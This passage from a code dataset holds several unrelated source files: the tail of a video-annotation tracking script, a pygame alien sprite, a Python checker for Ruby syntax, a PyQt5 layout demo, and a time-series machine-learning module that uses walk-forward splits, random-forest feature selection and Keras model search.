for idx in range(0, length):\n i_bbox_traj[idx + cur_interval[0]] = i_bboxes[idx]\n\n viou_max = viou\n \n else:\n # If all methods are tried and no one tracked successfully\n if (tracker_tried == track_num) and (viou_max == 0):\n mid = (cur_interval[1]+cur_interval[0])//2\n interval.append([cur_interval[0], mid])\n interval.append([mid, cur_interval[1]])\n \n # print(final_interval, false_interval)\n\n # Generate a list to record all manually labeled frame id\n manual_label = len(final_interval) + len(false_interval)+1\n print(f\"There are {manual_label} frames need to be manually labeled.\")\n all_interval = final_interval + false_interval\n\n keyframe = set()\n\n for interval in all_interval:\n keyframe.add(interval[0])\n keyframe.add(interval[1])\n \n # Get the gt trajectory\n gt_bbox_traj = gt.get_bboxes(cfg[\"obj_id\"])\n\n # Calculate the viou over groundtruth\n gt_viou = viou_gt(gt_bbox_traj, i_bbox_traj)\n\n print(f\"The viou between the estimation and gt is {gt_viou}\")\n\n # Draw the bbox to the frame\n draw_result(frame_list, i_bbox_traj, cfg[\"save_path\"], True, gt_bbox_traj, True, keyframe)\n\n# [[0,143], [263, 359]]\n# [[0,124]]","repo_name":"haliphinx/semi_auto_annotation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725981554","text":"import pygame\nfrom pygame.sprite import Sprite\n\n\nclass Alien(Sprite):\n \"\"\"A Class representing a single Alien in the fleet.\"\"\"\n\n def __init__(self, ai_settings, screen):\n \"\"\"Initializes the Alien and sets its inicial position.\"\"\"\n super(Alien, self).__init__()\n self.screen = screen\n self.ai_settings = ai_settings\n # Loads the Alien image and sets its rect attribute.\n self.image = pygame.image.load(\"images/alien.bmp\")\n self.rect = self.image.get_rect()\n # Starts each new Alien near the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n # Stores the exactly Alien's position.\n self.x = float(self.rect.x)\n\n def blitme(self):\n \"\"\"Draws the Alien in its current position.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def update(self):\n \"\"\"Moves the Alien to the right or to the left.\"\"\"\n self.x += (self.ai_settings.alien_speed_factor * self.ai_settings.fleet_direction)\n self.rect.x = self.x\n\n def check_edges(self):\n \"\"\"Returns True if the Alien is at the edge of the screen.\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.right >= screen_rect.right:\n return True\n elif self.rect.left <= 0:\n return True\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_intensivo_de_python/alien_invasion/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35088420456","text":"import re\n\ndef verificar_equilibrio_ruby(codigo):\n stack = []\n lineas = codigo.split(\"\\n\")\n\n for numero_linea, linea in enumerate(lineas, start=1):\n inicio = re.search(r'\\b(if |unless|while|until|for|case|class|def)\\b', linea)\n final = re.search(r'\\bend\\b', linea)\n\n if inicio:\n stack.append({inicio.group(), numero_linea})\n if final:\n if not stack:\n print(f\"Falta un 'end' en la línea {numero_linea}\")\n return f\"Falta un 'end' en la línea {numero_linea}\"\n else:\n stack.pop()\n\n if(\"if\" in linea):\n if \"key\" in linea:\n pattern = r'if\\s+\\w+\\s*\\.key\\?\\(\\w+\\)\\s*(?:&&\\s*\\w+\\s*\\.key\\?\\(\\w+\\))?\\s*$'\n if re.match(pattern, linea):\n print(\"La cadena es válida.\")\n else:\n pattern2 = r'^\\s*if\\s+\\w+\\s*\\[\\w+\\]\\.key\\?\\(\\w+\\)\\s*$'\n if re.match(pattern2, linea):\n print(\"La cadena es válida.\")\n else:\n return f\"Error en el if en la línea {numero_linea}\"\n \n \n \n # Verificar si hay 'end' sin pareja\n for numero_linea,estructura in stack:\n print(f\"falta un end para '{estructura}' en el código linea '{numero_linea}'\")\n return f\"falta un end para '{estructura}' en el código linea '{numero_linea}'\"\n resultado =validar_diccionario_ruby(codigo)\n\n if resultado:\n return str(resultado)\n \n \n\ndef validar_estructuras_ruby(codigo_ruby):\n lineas = codigo_ruby.split('\\n')\n variables_definidas = set()\n patrones = {\n r'^\\s*if\\s*(\\([^)]+\\))?([^:]+)$': \"if\",\n r'^\\s*while\\s*(\\([^)]+\\))?([^:]+)$': \"while\",\n r'^\\s*elsif\\s*(\\([^)]+\\))?([^:]+)$': \"elsif\",\n r'^\\s*unless\\s*(\\([^)]+\\))?([^:]+)$': \"unless\", \n r'^\\s*until\\s*(\\([^)]+\\))?([^:]+)$': \"until\"\n }\n\n for numero_linea, linea in enumerate(lineas, start=1):\n for patron, estructura in patrones.items():\n if re.search(r'\\b' + estructura + r'\\b', linea) and not re.search(r'([\"\\']).*?\\1', linea):\n match = re.match(patron, linea)\n if match:\n condicion = match.group(2).strip()\n for token in re.findall(r'\\w+|\\d+|\\S', condicion):\n if token.isalpha() and token not in variables_definidas and token != \"then\":\n if not (token == \"key\"):\n print(f\"Error en la línea {numero_linea}: La variable '{token}' en la condición del '{estructura}' no está definida en líneas anteriores.\")\n return f\"Error en la línea {numero_linea}: La variable '{token}' en la condición del '{estructura}' no está definida en líneas anteriores.\"\n else:\n print(f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un '{estructura}'.\")\n return f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un '{estructura}'.\"\n\n # Buscar variables definidas en líneas anteriores\n for variable in re.findall(r'\\w+', linea):\n variables_definidas.add(variable)\n\n\n\ndef validar_for_ruby(codigo_ruby):\n lineas = codigo_ruby.split('\\n')\n patron_for = r'^\\s*for\\s+([a-zA-Z_]\\w*)\\s+in\\s+([a-zA-Z_]\\w*|\\d+\\.\\.\\d+)\\s*$' # Expresión regular para buscar \"for variable in variable_o_rango\"\n\n for numero_linea, linea in enumerate(lineas, start=1):\n if re.search(r'\\bfor\\b', linea) and not re.search(r'([\"\\']).*?\\1', linea):\n match = re.match(patron_for, linea)\n if match:\n variable = match.group(1)\n variable_o_rango = match.group(2)\n if not variable.isspace():\n if '..' in variable_o_rango:\n rangos = variable_o_rango.split('..')\n if len(rangos) != 2 or not rangos[0].isdigit() or not rangos[1].isdigit():\n print(f\"Error en la línea {numero_linea}: El rango '{variable_o_rango}' después de 'in' no es válido.\")\n elif not variable_o_rango.isalpha():\n print(f\"Error en la línea {numero_linea}: '{variable_o_rango}' después de 'in' no es una variable o un rango válido.\")\n else:\n print(f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un 'for'.\")\n\n\ndef validar_diccionario_ruby(texto):\n \n patron_corchetes = re.compile(r'[{}]')\n \n # Pila para rastrear los corchetes abiertos\n pila_corchetes = []\n \n # Variable para rastrear si estamos dentro de un diccionario\n dentro_diccionario = False\n \n # Divide el texto en líneas y realiza un seguimiento del número de línea actual\n lineas = texto.split('\\n')\n numero_linea = 0\n \n nlinea=0\n for linea in lineas:\n numero_linea += 1\n # Verifica si la línea contiene corchetes\n if re.search(patron_corchetes, linea):\n for caracter in linea:\n if caracter == '{':\n pila_corchetes.append('{')\n # Si encontramos una '{', verificamos si estamos dentro de un diccionario\n if not dentro_diccionario and re.search(r'\\w+\\s*=\\s*\\{', linea):\n dentro_diccionario = True\n else:\n nlinea= numero_linea\n elif caracter == '}':\n if not pila_corchetes:\n return f\"Error: Corchete de cierre sin coincidencia en la línea {numero_linea}\"\n pila_corchetes.pop()\n \n # Si quedan corchetes sin cerrar en la pila, hay un error\n if pila_corchetes:\n return \"Error: Corchete de apertura sin coincidencia\"\n \n # Si no se encontraron errores de corchetes y estamos dentro de un diccionario, no hay problemas de sintaxis\n if not dentro_diccionario:\n return f\"No se encontro un diccionario para la conversion\"\n \n \n\n\n\n\n\n\n\n","repo_name":"DuvanFelipeDeveloper/CompiladorLenguajesFormales","sub_path":"analizadores/ruby/analizador_error.py","file_name":"analizador_error.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40183729730","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip, QWidget\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtGui import QIcon, QPalette, QColor\r\n\r\nclass Color(QWidget):\r\n def __init__(self, color):\r\n super(Color, self).__init__()\r\n self.setAutoFillBackground(True)\r\n\r\n palette = self.palette()\r\n palette.setColor(QPalette.Window, QColor(color))\r\n self.setPalette(palette)\r\n\r\nclass Window(QMainWindow):\r\n def __init__(self):\r\n super(Window, self).__init__()\r\n\r\n # hlayout1 = QtWidgets.QHBoxLayout() #? Create a Horizonal Layout\r\n # hlayout1.addWidget(Color(\"light pink\"))\r\n # hlayout1.addWidget(Color(\"light blue\"))\r\n # hlayout1.addWidget(Color(\"light green\"))\r\n # hlayout1.setContentsMargins(30,20,0,30) #? Margin (left, top, right, bottom)\r\n # hlayout1.setSpacing(30) #? Space between widgets\r\n\r\n # hlayout2 = QtWidgets.QHBoxLayout() #? Create a Horizonal Layout\r\n # hlayout2.addWidget(Color(\"purple\"))\r\n # hlayout2.addWidget(Color(\"orange\"))\r\n\r\n # vlayout = QtWidgets.QVBoxLayout() #? Create a Vertical Layout\r\n # vlayout.addLayout(hlayout1) #? Add h-ayout in v-layout\r\n # vlayout.addLayout(hlayout2)\r\n\r\n layout = QtWidgets.QGridLayout()\r\n layout.addWidget(Color(\"red\"), 0,0) #? (0,0) matrix in Grid Layout\r\n layout.addWidget(Color(\"light blue\"), 1,1) #? (1,1) matrix in Grid Layout\r\n layout.addWidget(Color(\"light green\"), 0,2) #? (0,2) matrix in Grid Layout\r\n\r\n widget = QWidget()\r\n widget.setLayout(layout) #? Screen Layout Design\r\n self.setCentralWidget(widget) #? Screen (window) color\r\n \r\n self.setWindowTitle(\"Application\") #? Window Title\r\n self.setGeometry(200,200,500,300) #? (x, y, size-w, size-h)\r\n self.setWindowIcon(QIcon(\"icon.png\")) #? Icon\r\n self.setToolTip(\"Application\")\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.lbl_name = QtWidgets.QLabel(self) #? Label of win form\r\n self.lbl_name.setText(\"First Name: \")\r\n self.lbl_name.move(50,30) #? (x, y)\r\n\r\n self.lbl_surname = QtWidgets.QLabel(self) #? Label of win form\r\n self.lbl_surname.setText(\"Last Name: \")\r\n self.lbl_surname.move(50,70) #? (x, y)\r\n\r\n self.lbl_result = QtWidgets.QLabel(self) #? Label of win form\r\n self.lbl_result.move(150, 150) #? (x, y)\r\n self.lbl_result.setText(\"Result\")\r\n self.lbl_result.resize(300,50)\r\n\r\n self.txt_name = QtWidgets.QLineEdit(self) #? Text of win form\r\n self.txt_name.move(150, 30) #? (x, y)\r\n self.txt_name.resize(200,25) #? (size-w, size-h)\r\n\r\n self.txt_surname = QtWidgets.QLineEdit(self) #? Text of win form\r\n self.txt_surname.move(150, 70) #? (x, y)\r\n self.txt_surname.resize(200,25) #? (size-w, size-h)\r\n\r\n self.btn_save = QtWidgets.QPushButton(self)\r\n self.btn_save.setText(\"Save\")\r\n self.btn_save.move(150,110)\r\n self.btn_save.clicked.connect(self.clicked)\r\n\r\n def clicked(self):\r\n self.lbl_result.setText(f\"Name: {self.txt_name.text()}\\nSurname: {self.txt_surname.text()}\")\r\n\r\ndef window():\r\n app = QApplication(sys.argv) #? be able to use System argument\r\n win = Window() #? Create Window\r\n win.show() #? Show Window\r\n sys.exit(app.exec()) #? use exec on app, for system exit\r\n\r\nwindow()","repo_name":"dvaser/pythonLibrary","sub_path":"Lessons/pyqt5Demo.py","file_name":"pyqt5Demo.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"69800396650","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.metrics import (\n classification_report\n)\nfrom sklearn.model_selection import (\n RandomizedSearchCV,\n PredefinedSplit,\n TimeSeriesSplit\n)\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import indexable\nfrom sklearn.utils.validation import _num_samples\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.feature_selection import SelectFromModel\nimport tensorflow as tf\n\n\nclass TimeSeriesSplitImproved(TimeSeriesSplit):\n \"\"\"\n This is a modified version of sklearn's TimeSeriesSplit.\n Provides train/test indices to split time series data samples\n that are observed at fixed time intervals, in train/test sets.\n\n There are 2 modifications to this class.\n 1. In each split, test indices must be higher than before,\n and thus shuffling in cross validator is inappropriate.\n I.e. there is no shuffling of samples.\n 2. There is now the ability to produce splits of fixed length.\n Previously, the only option was for successive training sets\n to be supersets of those that come before them. This was\n not suitable for addressing potential concept drift and\n therefore the argument 'fixed_length' was added to allow\n training sets that step forward.\n\n This cross-validation object is a variation of :class:`KFold`.\n In the kth split, it returns first k folds as train set and the\n (k+1)th fold as test set.\n Note that unlike standard cross-validation methods, successive\n training sets are supersets of those that come before them.\n Read more in the :ref:`User Guide `.\n Parameters\n ----------\n n_splits : int, default=3\n Number of splits. Must be at least 1.\n Examples\n --------\n >>> from sklearn.model_selection import TimeSeriesSplit\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([1, 2, 3, 4])\n >>> tscv = TimeSeriesSplit(n_splits=3)\n >>> print(tscv) # doctest: +NORMALIZE_WHITESPACE\n TimeSeriesSplit(n_splits=3)\n >>> for train_index, test_index in tscv.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [0] TEST: [1]\n TRAIN: [0 1] TEST: [2]\n TRAIN: [0 1 2] TEST: [3]\n >>> for train_index, test_index in tscv.split(X, fixed_length=True):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [0] TEST: [1]\n TRAIN: [1] TEST: [2]\n TRAIN: [2] TEST: [3]\n >>> for train_index, test_index in tscv.split(X, fixed_length=True,\n ... train_splits=2):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [0 1] TEST: [2]\n TRAIN: [1 2] TEST: [3]\n\n Notes\n -----\n When ``fixed_length`` is ``False``, the training set has size\n ``i * train_splits * n_samples // (n_splits + 1) + n_samples %\n (n_splits + 1)`` in the ``i``th split, with a test set of size\n ``n_samples//(n_splits + 1) * test_splits``, where ``n_samples``\n is the number of samples. If fixed_length is True, replace ``i``\n in the above formulation with 1, and ignore ``n_samples %\n (n_splits + 1)`` except for the first training set. The number\n of test sets is ``n_splits + 2 - train_splits - test_splits``.\n \"\"\"\n\n def split(self, X, y=None, groups=None, fixed_length=False,\n train_splits=1, test_splits=1):\n \"\"\"\n Generate indices to split data into training and test set.\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n y : array-like, shape (n_samples,)\n Always ignored, exists for compatibility.\n groups : array-like, with shape (n_samples,), optional\n Always ignored, exists for compatibility.\n fixed_length : bool, whether training sets should always have\n common length\n train_splits : positive int, for the minimum number of\n splits to include in training sets\n test_splits : positive int, for the number of splits to\n include in the test set\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups) # indexable arrays for x-val\n n_samples = _num_samples(X) # Return number of samples in array-like x\n n_splits = self.n_splits # number of split\n n_folds = n_splits + 1 # num folds (1 split=2 folds, 2 splits=3 folds)\n\n # defaults to 1 for each\n train_splits, test_splits = int(train_splits), int(test_splits)\n\n if n_folds > n_samples:\n raise ValueError(\n (\"Cannot have number of folds ={0} greater\"\n \" than the number of samples: {1}.\").format(n_folds,\n n_samples))\n if (n_folds - train_splits - test_splits) == 0 and test_splits > 0:\n raise ValueError(\n (\"Both train_splits and test_splits must be positive\"\n \" integers.\"))\n\n indices = np.arange(n_samples) # list indices of all the examples\n split_size = (n_samples // n_folds) # number of samples in each fold\n test_size = split_size * test_splits # number of samples in test set\n train_size = split_size * train_splits # num of samples in train set\n test_starts = range(train_size + n_samples % n_folds,\n n_samples - (test_size - split_size),\n split_size)\n if fixed_length:\n for i, test_start in zip(range(len(test_starts)),\n test_starts):\n rem = 0\n if i == 0:\n rem = n_samples % n_folds\n yield (indices[(test_start - train_size - rem):test_start],\n indices[test_start:test_start + test_size])\n else:\n for test_start in test_starts:\n yield (indices[:test_start],\n indices[test_start:test_start + test_size])\n\n\ndef return_walkforward_indices(X):\n \"\"\"\n For the train and test sets, this function returns the corresponding\n indices for each separate sliding window\n\n Parameters\n ----------\n X (df): the original X dataframe containing all features related\n to the asset in question\n\n Returns\n -------\n train_indices (list of arrays): arrays containing indices of each\n sliding window training samples\n E.g. [array([0, 1, 2, 3, 4]), array([5, 6, 7, 8, 9])]\n test_indices (list): arrays containing indices of each\n sliding window test samples\n E.g. [array([5, 6, 7]), array([10, 11, 12])]\n\n \"\"\"\n # set up the generator function to split the dataset into 4 windows\n tscv = TimeSeriesSplitImproved()\n split = tscv.split(X, fixed_length=True, train_splits=2, test_splits=1)\n\n train_indices = []\n test_indices = []\n\n for train_index, test_index in split:\n train_indices.append(train_index)\n test_indices.append(test_index)\n\n return train_indices, test_indices\n\n\ndef walkforward_split(X, y):\n \"\"\"\n This function uses the train and test indices of each sliding window\n - returned by return_walkforward_indices() - to slice the dataframe,\n creating n separate sliding windows.\n\n For each sliding window, there is now X_train, y_train, X_test, y_test.\n e.g. X_train_0, y_train_0, X_test_0, y_test_0 is for the first sliding\n window.\n\n The function also scales the inputs of each sliding window. The scaler\n is fit on each sliding window's training set, rather than the training\n set as a whole.\n\n Parameters\n ----------\n X (df): the original X dataframe containing all features related\n to the asset in question\n y (Series): the original labels that correspond with X\n\n Returns\n -------\n sets (dict of matrices): dict containing the train and test matrices\n for each sliding window.\n \"\"\"\n train_indices, test_indices = return_walkforward_indices(X)\n sets = {}\n scaler = StandardScaler()\n\n num_windows = len(train_indices)\n\n # for each sliding window (which equals the sum of train and test splits)\n for i in np.arange(num_windows):\n\n # create sliding window 'i' (containing train and test)\n set = {'X_train_'+str(i): pd.DataFrame(X.values[train_indices[i]]),\n 'y_train_'+str(i): pd.DataFrame(y.values[train_indices[i]]),\n 'X_test_'+str(i): pd.DataFrame(X.values[test_indices[i]]),\n 'y_test_'+str(i): pd.DataFrame(y.values[test_indices[i]])\n }\n sets.update(set)\n\n # scale the inputs for easier neural network learning\n for i in np.arange(0, len(sets), 4): # for each sliding window train set\n\n # fit scaler on the training data of training set 'i'\n # (only the training - don't cheat!)\n scaler.fit(list(sets.values())[i])\n\n # apply transformation on the training set\n list(sets.values())[i].\\\n update(scaler.transform(list(sets.values())[i]))\n # apply transformation on the test set\n list(sets.values())[i+2]\\\n .update(scaler.transform(list(sets.values())[i+2]))\n\n return sets\n\n\ndef model_selection_sets(windows, test_size=0.3):\n \"\"\"\n This function takes each sliding window training set and breaks\n it into a train and validation set for the purpose of model selection.\n\n Again, samples are not shuffled. It is a simple split to keep\n sequential ordering.\n\n Parameters\n ----------\n windows (dict of matrices): the dictionary containing the sets\n corresponding with each sliding window that is produced by\n walkforward_split().\n test_size (float): a float between 0 and 1 that determines the\n size of the proportion of samples to be assigned to the\n validation set.\n\n Returns\n -------\n sets_ms (dict of matrices): dict containing the train and validation\n set matrices for each sliding window, to be used for model\n selection.\n E.g. dict_keys(\n ['X_train_0', 'X_val_0', 'y_train_0', 'y_val_0', # SW0 MS sets\n 'X_train_1', 'X_val_1', 'y_train_1', 'y_val_1', # SW1 MS sets\n .....\n 'X_train_N', 'X_val_N', 'y_train_N', 'y_val_N', # SWN MS sets\n ])\n \"\"\"\n\n sets_ms = {} # ms = model selection\n\n for i in np.arange(0, len(windows), 4): # for each SW train set\n X_train, X_val, y_train, y_val = train_test_split(\n list(windows.values())[i],\n list(windows.values())[i+1],\n # i = X_train for given window, i+1 = y_train for given window\n test_size=test_size, shuffle=False)\n\n set_ms = {list(windows.keys())[i]+'_'+'a': X_train,\n 'X_val_'+str(list(windows.keys())[i])[8]: X_val,\n list(windows.keys())[i+1]+'_'+'a': y_train,\n 'y_val_'+str(list(windows.keys())[i])[8]: y_val}\n\n sets_ms.update(set_ms)\n\n return sets_ms\n\n\ndef extract_imp_feats(X_train, X_val, y_train, threshold_value, original):\n \"\"\"\n Runs a random forest on the train and validation set,\n then extracts the important features using SelectFromModel() function.\n\n Parameters\n ----------\n threshold_value: the threshold above which a variable is deemed\n 'important'\n original: the original X dataframe, from which feature names can be\n retrieved.\n\n Returns\n -------\n strong_features: indices of important features\n X_train_imp: X_train dataframe consisting of only important variables\n X_val_imp: X_val dataframe consisting of only important variables\n note: 'indices' can be used later to find important column names:\n X.columns[indices]\n \"\"\"\n\n # run random forest for feature selection\n rf = RandomForestClassifier(n_estimators=2000, n_jobs=-1)\n\n # select variables with an importance greater than 'threshold_value'\n sfm = SelectFromModel(rf, threshold=threshold_value)\n sfm.fit(X_train, y_train)\n\n # transform X to contain only 'important variables'\n X_train_imp = sfm.transform(X_train)\n X_val_imp = sfm.transform(X_val)\n\n # extract the important variables for use in out of sample testing\n strong_features = [] # indices of the selected features\n for feature in sfm.get_support(indices=True):\n strong_features.append(feature)\n\n return strong_features, X_train_imp, X_val_imp\n\n\ndef optimal_threshold(threshold_values, train_test_sets,\n sets_model_selection, original_df):\n \"\"\"\n Determines the optimal 'importance' threshold by selecting that which\n minimises the Random Forest out-of-bag error for the validation set.\n\n Parameters\n ----------\n threshold_values (list): an array of thresholds\n e.g. [0.005, ..., 0.009]\n train_test_sets (dict of matrices): dict containing the train and test\n matrices for each sliding window.\n sets_model_selection (dict of matrices): dict containing the train and\n validation sets for each sliding window.\n original_df: the original X dataframe, from which feature names can be\n retrieved\n\n Returns\n -------\n min_idx: index of threshold that minimises oob error\n df_errors: a dataframe containing errors for each sliding window and\n threshold setting\n \"\"\"\n threshold_errors = {} # dict to hold the oob error rates for each SW\n\n # return important features for each SW, for a given thresh. value\n for threshold in enumerate(threshold_values): # for each threshold value\n indices_important = {}\n\n error_rates = [] # store sliding window errors each threshold\n\n for i in np.arange(0, len(train_test_sets), 4):\n\n # assign the train and validation sets for the given sliding window\n\n X_train = list(sets_model_selection.values())[i]\n X_val = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_val = list(sets_model_selection.values())[i+3]\n\n # feat selection using RF, returning reduced train and val sets\n feature_index, X_train, X_val = extract_imp_feats(\n X_train,\n X_val,\n y_train,\n threshold_value=threshold[1],\n original=original_df)\n\n # store the important indices for the sliding window in question\n _ = {'indices_' +\n str(list(sets_model_selection.keys())[i])[8]: feature_index}\n\n # update the dict with the indices of important vars for each SW\n indices_important.update(_)\n\n # evaluate performance of these variables using a standard RF\n rf = RandomForestClassifier(n_estimators=1000, oob_score=True,\n n_jobs=-1)\n\n # X_train is now the reduced dataframe (only imp. vars)\n rf.fit(X_train, y_train)\n oob_error = 1 - rf.oob_score_\n error_rates.append(oob_error)\n\n # update dictionary with errors for each sliding window\n threshold_errors.update(\n {str(threshold[1])+\"_threshold\": error_rates})\n df_errors = pd.DataFrame(list(threshold_errors.values())).T\n\n # returns the index of threshold that minimises oob error for each SW\n min_idx = df_errors.idxmin(axis=1)\n\n return min_idx, df_errors\n\n\ndef extract_imp_features(X, sets, sets_ms, threshold_settings, opt_thresh_idx):\n \"\"\"\n Extract important features (their indices) using the thresholds determined\n by optimal_threshold().\n\n E.g. if there are 4 sliding windows, each with the 4 sets required for\n model selection:\n\n sets_ms = dict_keys(['X_train_0_a', 'X_val_0', 'y_train_0_a', 'y_val_0',\n 'X_train_1_a', 'X_val_1', 'y_train_1_a', 'y_val_1',\n 'X_train_2_a', 'X_val_2', 'y_train_2_a', 'y_val_2',\n 'X_train_3_a', 'X_val_3', 'y_train_3_a', 'y_val_3'])\n\n Pass the dicts associated with each sliding window to extract_imp_feats().\n\n Parameters\n ----------\n X (df): the original X dataframe, from which feature names can be\n retreived\n sets (dict of dfs): Dict containing the train and test sets\n associated with each sliding window. Generated by\n walkforward_split().\n sets_ms (dict of matrices): Dict containing the train and validation\n indices for a given asset.\n threshold_settings (list): list of thresholds e.g. [0.005, ..., 0.009].\n opt_thresh_idx (int): the index of threshold settings found to be\n optimal via optimal_threshold().\n Returns\n -------\n indices (dict): a dictionary containing the lists of feature indices\n deemed to be important for each sliding window.\n \"\"\"\n\n indices = {}\n\n # step through the sets 4 at a time, becauase there are 4 dicts\n # assoc. w/ each sliding window (X_train_val, X_val, y_train_val, y_train)\n for idx, i in enumerate(np.arange(0, len(sets), 4)):\n # assign the train and validation sets for the given sliding window\n X_train = list(sets_ms.values())[i]\n X_val = list(sets_ms.values())[i+1]\n y_train = list(sets_ms.values())[i+2]\n y_val = list(sets_ms.values())[i+3] # 4th\n\n window_num = str(list(sets_ms.keys())[i])[8]\n\n # perform feature selection using RF\n feature_index, \\\n sets_ms['X_train_' + window_num + '_' + 'a'], \\\n sets_ms['X_val_' + window_num], \\\n = extract_imp_feats(\n X_train,\n X_val,\n y_train,\n threshold_value=threshold_settings[opt_thresh_idx[idx]],\n original=X)\n\n imp_indices = {'indices_' + window_num: feature_index}\n indices.update(imp_indices)\n return indices\n\n\ndef create_model(optimizer='adam', neurons=1, learn_rate=0.01,\n momentum=0, kernel_initializer='normal',\n dropout_rate=0.0, input_dim=None):\n \"\"\"\n Creates a simple Keras Sequential model that will be passed to\n KerasClassifier object.\n\n Parameters\n ----------\n optimizer (str): required to compile a Keras model. See\n https://www.tensorflow.org/api_docs/python/tf/keras/optimizers\n for an exhaustive list of optimizers.\n neurons (int):\n learn_rate (float): learning rate of chosen optimizer.\n dropout_rate (float): probability that a random node will be dropped\n in each weight update cycle.\n input_dim (int): number of features in dataset\n Returns\n -------\n\n \"\"\"\n with tf.device(\"/device:GPU:0\"):\n # create model\n model = Sequential()\n model.add(Dense(neurons, input_dim=input_dim, activation='relu',\n kernel_initializer=kernel_initializer))\n model.add(Dropout(dropout_rate))\n model.add(Dense(neurons, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n # Compile model\n optimizer = SGD(lr=learn_rate, momentum=momentum)\n model.compile(loss='binary_crossentropy', optimizer=optimizer,\n metrics=['accuracy'])\n return model\n\n\ndef model_selection(model, train_test_sets, sets_model_selection,\n param_distributions, n_jobs=1, n_iter=100, mlp=None):\n \"\"\"\n Performs model selection using random grid search without cross validation.\n\n Parameters\n ----------\n model (obj): enter model such as RandomForestClassifier() (default)\n train_test_sets (dict of matrices): dict containing the train and test\n matrices for each sliding window.\n sets_model_selection (dict of matrices): dict containing the train and\n validation sets for each sliding window.\n param_distributions (dict): pre-defined grid to search over, specific\n to the input 'model'.\n n_iter (int): Number of parameter settings that are sampled. n_iter\n trades off runtime vs quality of the solution.\n mlp (bool): True/False input indicating whether the model is a\n multilayer perceptron. If True, prompts the building of a Keras\n classifier with the appropriate input dimensions as determined via\n feature selection.\n Returns\n -------\n optimal_models (dict): a dict containing optimal models for each\n sliding window\n optimal_params (dict): a dict containing optimal hyper-parameters for\n each optimal model\n \"\"\"\n # dictionary to hold optimal models for each sliding window\n optimal_models = {}\n optimal_params = {}\n\n for i in np.arange(0, len(train_test_sets), 4):\n # assign the train and validation sets for the given sliding window\n X_train = list(sets_model_selection.values())[i]\n X_val = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_val = list(sets_model_selection.values())[i+3]\n\n # normalise the data if mlp\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_val = scaler.transform(X_val)\n\n # set up the inputs for PredefinedSplit;\n # will be input to RandomizedSearchCV\n my_train_fold = []\n for j in range(len(list(sets_model_selection.values())[i])):\n # -1 means the sample will be in the train set\n my_train_fold.append(-1)\n\n my_test_fold = []\n for j in range(len(list(sets_model_selection.values())[i+1])):\n # 0 means the sample will be in the validation set\n my_test_fold.append(0)\n\n my_fold = my_train_fold + my_test_fold\n\n ps = PredefinedSplit(test_fold=np.asarray(my_fold))\n\n # input dimensions for each MLP model will vary, depending on the\n # sliding window (due to feature selection)\n if mlp:\n input_dims = list(sets_model_selection.values())[i].shape[1]\n model = KerasClassifier(\n build_fn=create_model,\n input_dim=input_dims,\n verbose=0)\n\n # set up the grid search\n mdl_opt = RandomizedSearchCV(\n estimator=model,\n param_distributions=param_distributions,\n n_iter=n_iter,\n cv=ps,\n verbose=1,\n n_jobs=n_jobs) # note, with sliding window, use 5 fold\n\n # Fit the random search model: parameter combinations will be trained,\n # then tested on the validation set\n mdl_opt.fit(\n np.concatenate((X_train, X_val), axis=0),\n np.concatenate((y_train.values.ravel(),\n y_val.values.ravel()), axis=0))\n\n # return the optimal parameters\n mdl = {'optimal_model_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n mdl_opt.best_estimator_}\n optimal_models.update(mdl)\n\n if mlp:\n mdl_opt.best_estimator_.\\\n model.save('mlp_model_sw' +\n str(list(sets_model_selection.keys())[i])[8] +\n '_fs.h5')\n\n param = {'optimal_model_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n mdl_opt.best_params_}\n 